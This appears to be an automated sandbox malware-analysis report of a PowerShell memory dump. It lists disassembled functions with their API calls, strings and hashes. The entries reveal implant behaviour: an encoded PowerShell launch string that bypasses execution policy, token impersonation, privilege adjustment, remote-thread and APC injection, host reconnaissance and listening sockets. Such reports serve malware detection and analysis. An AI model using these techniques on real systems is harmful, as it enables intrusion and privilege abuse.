Part of subcall function 000001A6ED34F63C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F67E

_snprintf.LIBCMT ref: 000001A6ED347FD8
_snprintf.LIBCMT ref: 000001A6ED348334

Strings

%s%s: %s, xrefs: 000001A6ED347C94
%s%s, xrefs: 000001A6ED3480D7
?%s=%s, xrefs: 000001A6ED347D5A
%s&%s, xrefs: 000001A6ED34826A
%s%s, xrefs: 000001A6ED347FC7, 000001A6ED347FF1, 000001A6ED348195, 000001A6ED348326
?%s, xrefs: 000001A6ED348257
%s&%s=%s, xrefs: 000001A6ED347D77

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
API String ID: 3442832105-1222817042
Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
Instruction ID: fe103d8d6c5b670ad9119a3cd1218443bc839687b5b87d80bd6c7cb81221a173
Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
Instruction Fuzzy Hash: C74294B9715E84D2EA25CB2DD0012E9A3A0FFA7799F085101DF8817B65EB3DD1ABC341

Function 000001A6ED341C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED341C63

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

Part of subcall function 000001A6ED33D044: malloc.LIBCMT ref: 000001A6ED33D057

Part of subcall function 000001A6ED33D074: htonl.WS2_32 ref: 000001A6ED33D07F

GetCurrentDirectoryA.KERNEL32 ref: 000001A6ED341CDB
FindFirstFileA.KERNEL32 ref: 000001A6ED341D14
GetLastError.KERNEL32 ref: 000001A6ED341D23
free.LIBCMT ref: 000001A6ED341D5E
free.LIBCMT ref: 000001A6ED341D6B

Part of subcall function 000001A6ED34F244: HeapFree.KERNEL32 ref: 000001A6ED34F25A
Part of subcall function 000001A6ED34F244: _errno.LIBCMT ref: 000001A6ED34F264
Part of subcall function 000001A6ED34F244: GetLastError.KERNEL32 ref: 000001A6ED34F26C

FileTimeToSystemTime.KERNEL32 ref: 000001A6ED341D78
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 000001A6ED341D89
FindNextFileA.KERNEL32 ref: 000001A6ED341E46
FindClose.KERNEL32 ref: 000001A6ED341E57

Strings

D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 000001A6ED341DCB
.\*, xrefs: 000001A6ED341CBF
F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 000001A6ED341E29
%s, xrefs: 000001A6ED341CF9

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 723279517-1754256099
Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
Instruction ID: 09aa017eacb9896f8de8e8f20e9de99102cd62f897e9ef2dae28b901e03c5135
Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
Instruction Fuzzy Hash: 2861BE79715B51C2EB10DF29E8406DEA3A1F3A7B80F480016EE5943B9ADF7DC60ACB41

Function 000001A6ED2F6F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001A6ED2F7166
_snprintf.LIBCMT ref: 000001A6ED2F7183
_snprintf.LIBCMT ref: 000001A6ED2F70A5

Part of subcall function 000001A6ED2FEA3C: _errno.LIBCMT ref: 000001A6ED2FEA73
Part of subcall function 000001A6ED2FEA3C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FEA7E

_snprintf.LIBCMT ref: 000001A6ED2F73D8
_snprintf.LIBCMT ref: 000001A6ED2F7734

Strings

nop -exec bypass -EncodedCommand "%s", xrefs: 000001A6ED2F74D7
not create token: %d, xrefs: 000001A6ED2F7657

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
API String ID: 3442832105-3652497171
Opcode ID: 29d3f29f5f6492b1378f20e23f058006214b917aee44ffbdb384cf7444ec99de
Instruction ID: bd3c681463870caae9337c108138674d2ab836c16d40d6bb8a802cbc3a302b2f
Opcode Fuzzy Hash: 29d3f29f5f6492b1378f20e23f058006214b917aee44ffbdb384cf7444ec99de
Instruction Fuzzy Hash: AF42E776715E85D6FA56CB2CD0013E8A3A0FFA5759F185501DF8827B61EF38D2AAC301

Function 000001A6ED340F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32 ref: 000001A6ED340F8F
GetLastError.KERNEL32 ref: 000001A6ED340F9D
GetLastError.KERNEL32 ref: 000001A6ED340FC1

Part of subcall function 000001A6ED33FE54: MultiByteToWideChar.KERNEL32 ref: 000001A6ED33FE81
Part of subcall function 000001A6ED33FE54: MultiByteToWideChar.KERNEL32 ref: 000001A6ED33FEA9

CreateProcessA.KERNEL32 ref: 000001A6ED341013
GetLastError.KERNEL32 ref: 000001A6ED34101D
GetCurrentDirectoryW.KERNEL32 ref: 000001A6ED341374
GetCurrentDirectoryW.KERNEL32 ref: 000001A6ED341388
CreateProcessWithTokenW.ADVAPI32 ref: 000001A6ED3413D1

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
String ID:
API String ID: 3044875250-0
Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
Instruction ID: 5851f3c39ca29431b2342a5aad1c5b4d6b7a19706b5d994c0090bd0100be03dd
Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
Instruction Fuzzy Hash: 11718C3A316B40C2E760CF29E44439E73A1F76BB84F194125EA5947B99DF3DC859CB02

Function 000001A6ED349220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED34924F

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

_snprintf.LIBCMT ref: 000001A6ED349267

Part of subcall function 000001A6ED34F63C: _errno.LIBCMT ref: 000001A6ED34F673
Part of subcall function 000001A6ED34F63C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F67E

FindFirstFileA.KERNEL32 ref: 000001A6ED349272
free.LIBCMT ref: 000001A6ED34927E

Part of subcall function 000001A6ED34F244: HeapFree.KERNEL32 ref: 000001A6ED34F25A
Part of subcall function 000001A6ED34F244: _errno.LIBCMT ref: 000001A6ED34F264
Part of subcall function 000001A6ED34F244: GetLastError.KERNEL32 ref: 000001A6ED34F26C

malloc.LIBCMT ref: 000001A6ED3492CE
_snprintf.LIBCMT ref: 000001A6ED3492E6
free.LIBCMT ref: 000001A6ED34930E
FindNextFileA.KERNEL32 ref: 000001A6ED349327
FindClose.KERNEL32 ref: 000001A6ED349338

Strings

%s\*, xrefs: 000001A6ED349254

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
String ID: %s\*
API String ID: 2620626937-766152087
Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
Instruction ID: 0e850814b4745a7c7d531c147960de21444ab5bfb33c2c8cfa17b750d4a87af0
Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
Instruction Fuzzy Hash: 4531233D31658085EA65DB6B29103E97B9273ABFD0F8C40509EA5077DACA3DC41BC315

Function 000001A6ED343A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED343ACE
GetProcAddress.KERNEL32 ref: 000001A6ED343ADE

Part of subcall function 000001A6ED343984: malloc.LIBCMT ref: 000001A6ED3439C2
Part of subcall function 000001A6ED343984: free.LIBCMT ref: 000001A6ED343A45

CreateToolhelp32Snapshot.KERNEL32 ref: 000001A6ED343B10
Thread32Next.KERNEL32 ref: 000001A6ED343B7A
Sleep.KERNEL32 ref: 000001A6ED343B90

Part of subcall function 000001A6ED34CE74: NtOpenThread.NTDLL ref: 000001A6ED34CF11

Part of subcall function 000001A6ED34C754: NtClose.NTDLL ref: 000001A6ED34C788

Strings

NtQueueApcThread, xrefs: 000001A6ED343AD4
ntdll, xrefs: 000001A6ED343A99

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateHandleModuleNextOpenProcSleepSnapshotThreadThread32Toolhelp32freemalloc
String ID: NtQueueApcThread$ntdll
API String ID: 2813406631-1374908105
Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
Instruction ID: 28cdd4c789cb70f988b9d1818039d883a4c21a2a68f8d282fdb775e129af738a
Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
Instruction Fuzzy Hash: 59418B3A702B01D9EB20CB6AE8403DD73A4F76AB88F584125DE4C57B89EF79C54AC741

Function 000001A6ED34B47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED345FEC: malloc.LIBCMT ref: 000001A6ED346008

malloc.LIBCMT ref: 000001A6ED34B528

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

Part of subcall function 000001A6ED34EAA8: malloc.LIBCMT ref: 000001A6ED34EAF8

GetComputerNameExA.KERNEL32 ref: 000001A6ED34B5EA
GetComputerNameA.KERNEL32 ref: 000001A6ED34B61F
GetUserNameA.ADVAPI32 ref: 000001A6ED34B654

Part of subcall function 000001A6ED33F014: WSASocketA.WS2_32 ref: 000001A6ED33F042

malloc.LIBCMT ref: 000001A6ED34B76D

Strings

VUUU, xrefs: 000001A6ED34B6B0

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
String ID: VUUU
API String ID: 632458648-2040033107
Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
Instruction ID: 6038145589f8a931a5870d692c15c08e93ec841261f55108df10d6e1a9b1a393
Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
Instruction Fuzzy Hash: E0A1A13D702690C6EB14EB6ED8513ED2261BBAB7C4F9840259949977D6DE3EC50EC302

Function 000001A6ED346A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 000001A6ED346AB0
htons.WS2_32 ref: 000001A6ED346AD0
ioctlsocket.WS2_32 ref: 000001A6ED346AEC
closesocket.WS2_32 ref: 000001A6ED346AFA
bind.WS2_32 ref: 000001A6ED346B0D
listen.WS2_32 ref: 000001A6ED346B1D

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 1767165869-0
Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
Instruction ID: 6fae8153655a42f69e8782da164f6602590ee05a69ab4a99ff662ad8edd5a8a3
Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
Instruction Fuzzy Hash: C921DE3D312A50C2E724CF0AA41029DA7B0F79BFA4F594624DE6A03790DB7DC44E8702

Function 000001A6ED346670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 000001A6ED346698
htons.WS2_32 ref: 000001A6ED3466A4
socket.WS2_32 ref: 000001A6ED3466BC
closesocket.WS2_32 ref: 000001A6ED3466CE
bind.WS2_32 ref: 000001A6ED3466FB
ioctlsocket.WS2_32 ref: 000001A6ED346715

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3910169428-0
Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
Instruction ID: 6151574787ef5595f22836ddc306161b955070e53afaab72e0a030d4a8e1225e
Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
Instruction Fuzzy Hash: 5221AC3D322A40C2E724DF29E8143D96760F79BBA8F5942299E29433D0EE3DC94EC701

Function 000001A6ED34DF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED34DCC0: RevertToSelf.ADVAPI32 ref: 000001A6ED34DCDD

LogonUserA.ADVAPI32 ref: 000001A6ED34DF98
GetLastError.KERNEL32 ref: 000001A6ED34DFA2

Part of subcall function 000001A6ED345FEC: malloc.LIBCMT ref: 000001A6ED346008

Part of subcall function 000001A6ED33FE54: MultiByteToWideChar.KERNEL32 ref: 000001A6ED33FE81
Part of subcall function 000001A6ED33FE54: MultiByteToWideChar.KERNEL32 ref: 000001A6ED33FEA9

Part of subcall function 000001A6ED33D044: malloc.LIBCMT ref: 000001A6ED33D057

ImpersonateLoggedOnUser.ADVAPI32 ref: 000001A6ED34DFC0
GetLastError.KERNEL32 ref: 000001A6ED34DFCA

Strings

%s\%s, xrefs: 000001A6ED34E084

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
String ID: %s\%s
API String ID: 3621627092-4073750446
Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
Instruction ID: df09e2ddfc3d5e9706f13912dd2be2b9d48b229f4850289bfba5ffb9c2c49c2f
Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
Instruction Fuzzy Hash: 3B415A38312B44D1FB10EB6AF9547DA23A0E7A7B81F5C2029A95957796DE3CC14EC702

Function 000001A6ED33FA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED33FA3D
Sleep.KERNEL32 ref: 000001A6ED33FAAC
GetTickCount.KERNEL32 ref: 000001A6ED33FAB2
Sleep.KERNEL32 ref: 000001A6ED33FACB
closesocket.WS2_32 ref: 000001A6ED33FAD4

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountSleepTick$closesocket
String ID:
API String ID: 2363407838-0
Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
Instruction ID: dc29426615f8004fba6fabc9e807047761b13d5bef60ffc230e201348174a8e2
Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
Instruction Fuzzy Hash: 4F219839706684C1E610EB2AE5441DD6360B7A7BE0F980721ADB9477D6DE3CC50D8742

Function 000001A6ED34EE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32 ref: 000001A6ED34EEC1
closesocket.WS2_32 ref: 000001A6ED34EED3
htons.WS2_32 ref: 000001A6ED34EEE4
bind.WS2_32 ref: 000001A6ED34EF05
listen.WS2_32 ref: 000001A6ED34EF1A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonslistensocket
String ID:
API String ID: 564772725-0
Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
Instruction ID: 0e6fa7023b1d3565c3622995ad1f21cea00e0f4c0544c929ee7b2d05b948537e
Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
Instruction Fuzzy Hash: 8711023E315654C2E620DF1AE41429EB360F7A7BA0F0C0222EEA9177D4DF3DC00A8706

Function 000001A6ED340B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32 ref: 000001A6ED340BEA
AdjustTokenPrivileges.ADVAPI32 ref: 000001A6ED340C1A
GetLastError.KERNEL32 ref: 000001A6ED340C24

Strings

%s, xrefs: 000001A6ED340C32

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID: %s
API String ID: 4244140340-620797490
Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
Instruction ID: fef275e88e7bfe46f48d697a2dc2769987f520db7c1584893fdae497269ea533
Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
Instruction Fuzzy Hash: F2216D76B01B00DAE710DB65D4447EC33B5B766B88F4844158E4D97A89EF78C519C381

Function 000001A6ED34C8F4 Relevance: 6.1, APIs: 4, Instructions: 90threadnativeinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34C968
NtCreateThreadEx.NTDLL ref: 000001A6ED34C9BE
CreateThread.KERNEL32 ref: 000001A6ED34CA28
CreateRemoteThread.KERNEL32 ref: 000001A6ED34CA51

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CreateThread$CurrentProcessRemote
String ID:
API String ID: 3122335635-0
Opcode ID: e1580dfa70b3980f766e965672b95bf8708a4f973e05a7db7a48af4142a1e277
Instruction ID: 08727bec363425af3b1db11bc9eb7fad2dbdfd05edce9dbe5c9b0399614f2df0
